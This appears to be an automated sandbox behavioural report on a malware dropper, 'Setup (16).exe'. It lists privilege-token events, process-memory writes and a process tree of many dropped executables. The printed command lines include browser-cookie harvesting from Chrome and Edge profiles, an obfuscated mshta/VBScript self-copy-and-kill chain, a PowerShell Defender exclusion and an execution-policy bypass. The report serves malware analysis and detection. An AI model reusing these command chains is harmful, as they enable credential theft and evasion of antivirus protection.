GFXV5uf_XQa804CDnoWH0M3p.exe Token: SeDebugPrivilege 4732 aSn9fqpqDhGYu3GbZ1S1TS6I.exe Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeDebugPrivilege 1764 WerFault.exe Token: SeDebugPrivilege 4976 WerFault.exe Token: SeDebugPrivilege 4876 WerFault.exe Token: SeDebugPrivilege 1068 7L7SmCmxZBuK866H9J56dZ9i.exe Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeDebugPrivilege 3272 WerFault.exe Token: SeDebugPrivilege 4692 knDM9K2WuDIgPpvZTz7iJyiv.exe Token: SeDebugPrivilege 4848 ZleAaxLiBY5xMwGlObFp_7l2.exe Token: SeDebugPrivilege 3724 8VmzjVht_DClLCJG_RJh5V4E.exe Token: SeDebugPrivilege 4408 6641540.exe Token: SeDebugPrivilege 2280 taskkill.exe Token: SeDebugPrivilege 1656 wpjiSuP2zkRSF5LjZiDIMr7J.exe Token: SeDebugPrivilege 3524 WerFault.exe Token: SeDebugPrivilege 4220 5XHdUK3CmLKAHDrBaHQzFR94.exe Token: SeDebugPrivilege 488 8011660.exe Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeDebugPrivilege 3644 3187448.exe Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeShutdownPrivilege 2824 Token: SeCreatePagefilePrivilege 2824 Token: SeCreateTokenPrivilege 5856 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 5856 askinstall53.exe Token: SeLockMemoryPrivilege 5856 askinstall53.exe Token: SeIncreaseQuotaPrivilege 5856 askinstall53.exe Token: SeMachineAccountPrivilege 5856 askinstall53.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
VU1EDKbEK8gfqyvnCHOs4E4z.tmpCleaner Installation.exeInlog.tmpEsplorarne.exe.comtapinstall.exepid process 4760 VU1EDKbEK8gfqyvnCHOs4E4z.tmp 5704 Cleaner Installation.exe 5804 Inlog.tmp 6048 Esplorarne.exe.com 2824 2824 6140 tapinstall.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup (16).exedescription pid process target process PID 3892 wrote to memory of 4012 3892 Setup (16).exe onR8itfYViCRadwknZWvxq1a.exe PID 3892 wrote to memory of 4012 3892 Setup (16).exe onR8itfYViCRadwknZWvxq1a.exe PID 3892 wrote to memory of 4012 3892 Setup (16).exe onR8itfYViCRadwknZWvxq1a.exe PID 3892 wrote to memory of 1068 3892 Setup (16).exe 7L7SmCmxZBuK866H9J56dZ9i.exe PID 3892 wrote to memory of 1068 3892 Setup (16).exe 7L7SmCmxZBuK866H9J56dZ9i.exe PID 3892 wrote to memory of 1068 3892 Setup (16).exe 7L7SmCmxZBuK866H9J56dZ9i.exe PID 3892 wrote to memory of 3276 3892 Setup (16).exe knDM9K2WuDIgPpvZTz7iJyiv.exe PID 3892 wrote to memory of 3276 3892 Setup (16).exe knDM9K2WuDIgPpvZTz7iJyiv.exe PID 3892 wrote to memory of 3276 3892 Setup (16).exe knDM9K2WuDIgPpvZTz7iJyiv.exe PID 3892 wrote to memory of 1072 3892 Setup (16).exe wYHXVXkFz5ne2Vq6ab0DG5k3.exe PID 3892 wrote to memory of 1072 3892 Setup (16).exe wYHXVXkFz5ne2Vq6ab0DG5k3.exe PID 3892 wrote to memory of 1072 3892 Setup (16).exe wYHXVXkFz5ne2Vq6ab0DG5k3.exe PID 3892 wrote to memory of 3744 3892 Setup (16).exe pmraugcfGvbfWwNKMGckSwss.exe PID 3892 wrote to memory of 3744 3892 Setup (16).exe pmraugcfGvbfWwNKMGckSwss.exe PID 3892 wrote to memory of 3744 3892 Setup (16).exe pmraugcfGvbfWwNKMGckSwss.exe PID 3892 wrote to memory of 3728 3892 Setup (16).exe YfaqickjSQEwGsn4tTZyes3_.exe PID 3892 wrote to memory of 3728 3892 Setup (16).exe YfaqickjSQEwGsn4tTZyes3_.exe PID 3892 wrote to memory of 3728 3892 Setup (16).exe YfaqickjSQEwGsn4tTZyes3_.exe PID 3892 wrote to memory of 2560 3892 Setup (16).exe P2jRvKFkhoFqiCE2FzuSofFu.exe PID 3892 wrote to memory of 2560 3892 Setup (16).exe P2jRvKFkhoFqiCE2FzuSofFu.exe PID 3892 wrote to memory of 2560 3892 Setup (16).exe P2jRvKFkhoFqiCE2FzuSofFu.exe PID 3892 wrote to memory of 2676 3892 Setup (16).exe 8N7tugtAoWe9lbLX05F7nk6f.exe PID 3892 wrote to memory of 2676 3892 Setup (16).exe 8N7tugtAoWe9lbLX05F7nk6f.exe PID 3892 wrote to memory of 2676 3892 Setup (16).exe 8N7tugtAoWe9lbLX05F7nk6f.exe PID 3892 wrote to memory of 1656 3892 Setup (16).exe wpjiSuP2zkRSF5LjZiDIMr7J.exe PID 3892 wrote to memory of 1656 3892 Setup (16).exe wpjiSuP2zkRSF5LjZiDIMr7J.exe PID 3892 wrote to memory of 1656 3892 Setup (16).exe wpjiSuP2zkRSF5LjZiDIMr7J.exe PID 3892 wrote to memory of 2680 3892 Setup (16).exe p677u7IwPoa5s4gcdt8zN2Yk.exe PID 3892 wrote to memory of 2680 3892 Setup (16).exe p677u7IwPoa5s4gcdt8zN2Yk.exe PID 3892 wrote to memory of 2680 3892 Setup (16).exe p677u7IwPoa5s4gcdt8zN2Yk.exe PID 3892 wrote to memory of 3172 3892 Setup (16).exe ZleAaxLiBY5xMwGlObFp_7l2.exe PID 3892 wrote to memory of 3172 3892 Setup (16).exe ZleAaxLiBY5xMwGlObFp_7l2.exe PID 3892 wrote to memory of 3172 3892 Setup (16).exe ZleAaxLiBY5xMwGlObFp_7l2.exe PID 3892 wrote to memory of 192 3892 Setup (16).exe 888qQtt12NDSY2tU8zniAWFT.exe PID 3892 wrote to memory of 192 3892 Setup (16).exe 888qQtt12NDSY2tU8zniAWFT.exe PID 3892 wrote to memory of 192 3892 Setup (16).exe 888qQtt12NDSY2tU8zniAWFT.exe PID 3892 wrote to memory of 1308 3892 Setup (16).exe sYC7WokZSkdkVMNtIgLEIsRL.exe PID 3892 wrote to memory of 1308 3892 Setup (16).exe sYC7WokZSkdkVMNtIgLEIsRL.exe PID 3892 wrote to memory of 1308 3892 Setup (16).exe sYC7WokZSkdkVMNtIgLEIsRL.exe PID 3892 wrote to memory of 3252 3892 Setup (16).exe OlLnyMjDYM2HF94iR5guLlDE.exe PID 3892 wrote to memory of 3252 3892 Setup (16).exe OlLnyMjDYM2HF94iR5guLlDE.exe PID 3892 wrote to memory of 3252 3892 Setup (16).exe OlLnyMjDYM2HF94iR5guLlDE.exe PID 3892 wrote to memory of 3724 3892 Setup (16).exe 8VmzjVht_DClLCJG_RJh5V4E.exe PID 3892 wrote to memory of 3724 3892 Setup (16).exe 8VmzjVht_DClLCJG_RJh5V4E.exe PID 3892 wrote to memory of 3724 3892 Setup (16).exe 8VmzjVht_DClLCJG_RJh5V4E.exe PID 3892 wrote to memory of 776 3892 Setup (16).exe 4tMCbZ0yGruE8d0Ny9jeWOfq.exe PID 3892 wrote to memory of 776 3892 Setup (16).exe 4tMCbZ0yGruE8d0Ny9jeWOfq.exe PID 3892 wrote to memory of 1928 3892 Setup (16).exe xvTYZ1hjTDj5Rr5UfraK7e1b.exe PID 3892 wrote to memory of 1928 3892 Setup (16).exe xvTYZ1hjTDj5Rr5UfraK7e1b.exe PID 3892 wrote to memory of 1928 3892 Setup (16).exe xvTYZ1hjTDj5Rr5UfraK7e1b.exe PID 3892 wrote to memory of 1316 3892 Setup (16).exe 0vwfJ_G6kZ5XuDO0BlYvi3cn.exe PID 3892 wrote to memory of 1316 3892 Setup (16).exe 0vwfJ_G6kZ5XuDO0BlYvi3cn.exe PID 3892 wrote to memory of 2716 3892 Setup (16).exe aSn9fqpqDhGYu3GbZ1S1TS6I.exe PID 3892 wrote to memory of 2716 3892 Setup (16).exe aSn9fqpqDhGYu3GbZ1S1TS6I.exe PID 3892 wrote to memory of 2716 3892 Setup (16).exe aSn9fqpqDhGYu3GbZ1S1TS6I.exe PID 3892 wrote to memory of 2892 3892 Setup (16).exe dsmuEcIl37bzLp4Drmm1l74f.exe PID 3892 wrote to memory of 2892 3892 Setup (16).exe dsmuEcIl37bzLp4Drmm1l74f.exe PID 3892 wrote to memory of 2892 3892 Setup (16).exe dsmuEcIl37bzLp4Drmm1l74f.exe PID 3892 wrote to memory of 3748 3892 Setup (16).exe YtjpPTrrwUN8IYNue5FqWCqm.exe PID 3892 wrote to memory of 3748 3892 Setup (16).exe YtjpPTrrwUN8IYNue5FqWCqm.exe PID 3892 wrote to memory of 3748 3892 Setup (16).exe YtjpPTrrwUN8IYNue5FqWCqm.exe PID 3892 wrote to memory of 3440 3892 Setup (16).exe GFXV5uf_XQa804CDnoWH0M3p.exe PID 3892 wrote to memory of 3440 3892 Setup (16).exe GFXV5uf_XQa804CDnoWH0M3p.exe PID 3892 wrote to memory of 3440 3892 Setup (16).exe GFXV5uf_XQa804CDnoWH0M3p.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup (16).exe"C:\Users\Admin\AppData\Local\Temp\Setup (16).exe"1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\Documents\onR8itfYViCRadwknZWvxq1a.exe"C:\Users\Admin\Documents\onR8itfYViCRadwknZWvxq1a.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4012 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 11403⤵
- Program crash
PID:5512
-
-
-
C:\Users\Admin\Documents\pmraugcfGvbfWwNKMGckSwss.exe"C:\Users\Admin\Documents\pmraugcfGvbfWwNKMGckSwss.exe"2⤵
- Executes dropped EXE
PID:3744 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 8963⤵
- Program crash
PID:4508
-
-
-
C:\Users\Admin\Documents\wYHXVXkFz5ne2Vq6ab0DG5k3.exe"C:\Users\Admin\Documents\wYHXVXkFz5ne2Vq6ab0DG5k3.exe"2⤵
- Executes dropped EXE
PID:1072 -
C:\Users\Admin\Documents\wYHXVXkFz5ne2Vq6ab0DG5k3.exe"C:\Users\Admin\Documents\wYHXVXkFz5ne2Vq6ab0DG5k3.exe"3⤵PID:1544
-
-
-
C:\Users\Admin\Documents\knDM9K2WuDIgPpvZTz7iJyiv.exe"C:\Users\Admin\Documents\knDM9K2WuDIgPpvZTz7iJyiv.exe"2⤵
- Executes dropped EXE
PID:3276 -
C:\Users\Admin\Documents\knDM9K2WuDIgPpvZTz7iJyiv.exeC:\Users\Admin\Documents\knDM9K2WuDIgPpvZTz7iJyiv.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
-
C:\Users\Admin\Documents\7L7SmCmxZBuK866H9J56dZ9i.exe"C:\Users\Admin\Documents\7L7SmCmxZBuK866H9J56dZ9i.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Users\Admin\Documents\YfaqickjSQEwGsn4tTZyes3_.exe"C:\Users\Admin\Documents\YfaqickjSQEwGsn4tTZyes3_.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3728 -
C:\Users\Admin\Documents\YfaqickjSQEwGsn4tTZyes3_.exe"C:\Users\Admin\Documents\YfaqickjSQEwGsn4tTZyes3_.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3712
-
-
-
C:\Users\Admin\Documents\8N7tugtAoWe9lbLX05F7nk6f.exe"C:\Users\Admin\Documents\8N7tugtAoWe9lbLX05F7nk6f.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2676 -
C:\Users\Admin\Documents\8N7tugtAoWe9lbLX05F7nk6f.exe"C:\Users\Admin\Documents\8N7tugtAoWe9lbLX05F7nk6f.exe"3⤵
- Executes dropped EXE
PID:3860
-
-
-
C:\Users\Admin\Documents\P2jRvKFkhoFqiCE2FzuSofFu.exe"C:\Users\Admin\Documents\P2jRvKFkhoFqiCE2FzuSofFu.exe"2⤵
- Executes dropped EXE
PID:2560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 6603⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 6763⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 6323⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 6603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 11323⤵
- Program crash
PID:5684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 11763⤵
- Program crash
PID:4272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 11523⤵
- Program crash
PID:6032
-
-
-
C:\Users\Admin\Documents\ZleAaxLiBY5xMwGlObFp_7l2.exe"C:\Users\Admin\Documents\ZleAaxLiBY5xMwGlObFp_7l2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3172 -
C:\Users\Admin\Documents\ZleAaxLiBY5xMwGlObFp_7l2.exeC:\Users\Admin\Documents\ZleAaxLiBY5xMwGlObFp_7l2.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4848
-
-
-
C:\Users\Admin\Documents\p677u7IwPoa5s4gcdt8zN2Yk.exe"C:\Users\Admin\Documents\p677u7IwPoa5s4gcdt8zN2Yk.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2680 -
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
PID:4436
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:4476 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5388
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6092
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4172
-
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6008
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:7540
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:10172
-
-
-
-
C:\Users\Admin\Documents\wpjiSuP2zkRSF5LjZiDIMr7J.exe"C:\Users\Admin\Documents\wpjiSuP2zkRSF5LjZiDIMr7J.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Users\Admin\Documents\OlLnyMjDYM2HF94iR5guLlDE.exe"C:\Users\Admin\Documents\OlLnyMjDYM2HF94iR5guLlDE.exe"2⤵
- Executes dropped EXE
PID:3252
-
-
C:\Users\Admin\Documents\sYC7WokZSkdkVMNtIgLEIsRL.exe"C:\Users\Admin\Documents\sYC7WokZSkdkVMNtIgLEIsRL.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-
C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe"C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe"2⤵
- Executes dropped EXE
PID:192 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )3⤵PID:4412
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\888qQtt12NDSY2tU8zniAWFT.exe" ) do taskkill -f -iM "%~NxA"4⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXEhbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS5⤵
- Executes dropped EXE
PID:1472 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )6⤵PID:3844
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"7⤵PID:4896
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a6⤵PID:3756
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "888qQtt12NDSY2tU8zniAWFT.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
-
-
-
C:\Users\Admin\Documents\xvTYZ1hjTDj5Rr5UfraK7e1b.exe"C:\Users\Admin\Documents\xvTYZ1hjTDj5Rr5UfraK7e1b.exe"2⤵
- Executes dropped EXE
PID:1928 -
C:\Users\Admin\Documents\xvTYZ1hjTDj5Rr5UfraK7e1b.exe"C:\Users\Admin\Documents\xvTYZ1hjTDj5Rr5UfraK7e1b.exe" -q3⤵
- Executes dropped EXE
PID:4832
-
-
-
C:\Users\Admin\Documents\4tMCbZ0yGruE8d0Ny9jeWOfq.exe"C:\Users\Admin\Documents\4tMCbZ0yGruE8d0Ny9jeWOfq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:776 -
C:\Users\Admin\AppData\Roaming\6641540.exe"C:\Users\Admin\AppData\Roaming\6641540.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
C:\Users\Admin\AppData\Roaming\3187448.exe"C:\Users\Admin\AppData\Roaming\3187448.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3644
-
-
C:\Users\Admin\AppData\Roaming\8011660.exe"C:\Users\Admin\AppData\Roaming\8011660.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:488
-
-
C:\Users\Admin\AppData\Roaming\1486191.exe"C:\Users\Admin\AppData\Roaming\1486191.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:304 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:5424
-
-
-
-
C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe"C:\Users\Admin\Documents\8VmzjVht_DClLCJG_RJh5V4E.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3724
-
-
C:\Users\Admin\Documents\0vwfJ_G6kZ5XuDO0BlYvi3cn.exe"C:\Users\Admin\Documents\0vwfJ_G6kZ5XuDO0BlYvi3cn.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Users\Admin\Documents\aSn9fqpqDhGYu3GbZ1S1TS6I.exe"C:\Users\Admin\Documents\aSn9fqpqDhGYu3GbZ1S1TS6I.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2716 -
C:\Users\Admin\Documents\aSn9fqpqDhGYu3GbZ1S1TS6I.exeC:\Users\Admin\Documents\aSn9fqpqDhGYu3GbZ1S1TS6I.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4732
-
-
-
C:\Users\Admin\Documents\YtjpPTrrwUN8IYNue5FqWCqm.exe"C:\Users\Admin\Documents\YtjpPTrrwUN8IYNue5FqWCqm.exe"2⤵
- Executes dropped EXE
PID:3748
-
-
C:\Users\Admin\Documents\dsmuEcIl37bzLp4Drmm1l74f.exe"C:\Users\Admin\Documents\dsmuEcIl37bzLp4Drmm1l74f.exe"2⤵
- Executes dropped EXE
PID:2892
-
-
C:\Users\Admin\Documents\fIAkXcZipnfF7F6wfSKwz046.exe"C:\Users\Admin\Documents\fIAkXcZipnfF7F6wfSKwz046.exe"2⤵
- Executes dropped EXE
PID:3784 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\FIAKXC~1.DLL,s C:\Users\Admin\DOCUME~1\FIAKXC~1.EXE3⤵PID:7456
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\FIAKXC~1.DLL,kD5SUQ==4⤵PID:7416
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\FIAKXC~1.DLL5⤵PID:5540
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\FIAKXC~1.DLL,bCtAVzM1aw==5⤵PID:8320
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318046⤵PID:8956
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵PID:9024
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpFB74.tmp.ps1"5⤵PID:9184
-
-
-
-
-
C:\Users\Admin\Documents\GFXV5uf_XQa804CDnoWH0M3p.exe"C:\Users\Admin\Documents\GFXV5uf_XQa804CDnoWH0M3p.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
-
C:\Users\Admin\Documents\VU1EDKbEK8gfqyvnCHOs4E4z.exe"C:\Users\Admin\Documents\VU1EDKbEK8gfqyvnCHOs4E4z.exe"2⤵PID:4604
-
-
C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe"C:\Users\Admin\Documents\5XHdUK3CmLKAHDrBaHQzFR94.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
C:\Users\Admin\Documents\Hke7Np3HCf3BHr3IQJqdiMka.exe"C:\Users\Admin\Documents\Hke7Np3HCf3BHr3IQJqdiMka.exe"2⤵
- Executes dropped EXE
PID:4148
-
-
C:\Users\Admin\AppData\Local\Temp\is-SRLPN.tmp\VU1EDKbEK8gfqyvnCHOs4E4z.tmp"C:\Users\Admin\AppData\Local\Temp\is-SRLPN.tmp\VU1EDKbEK8gfqyvnCHOs4E4z.tmp" /SL5="$3027C,138429,56832,C:\Users\Admin\Documents\VU1EDKbEK8gfqyvnCHOs4E4z.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\is-MU90T.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MU90T.tmp\Setup.exe" /Verysilent2⤵PID:5352
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"3⤵
- Executes dropped EXE
PID:5636
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent3⤵
- Executes dropped EXE
PID:5676 -
C:\Users\Admin\AppData\Local\Temp\is-DEBSG.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-DEBSG.tmp\Inlog.tmp" /SL5="$202E6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5804 -
C:\Users\Admin\AppData\Local\Temp\is-1U4I1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1U4I1.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7215⤵PID:7636
-
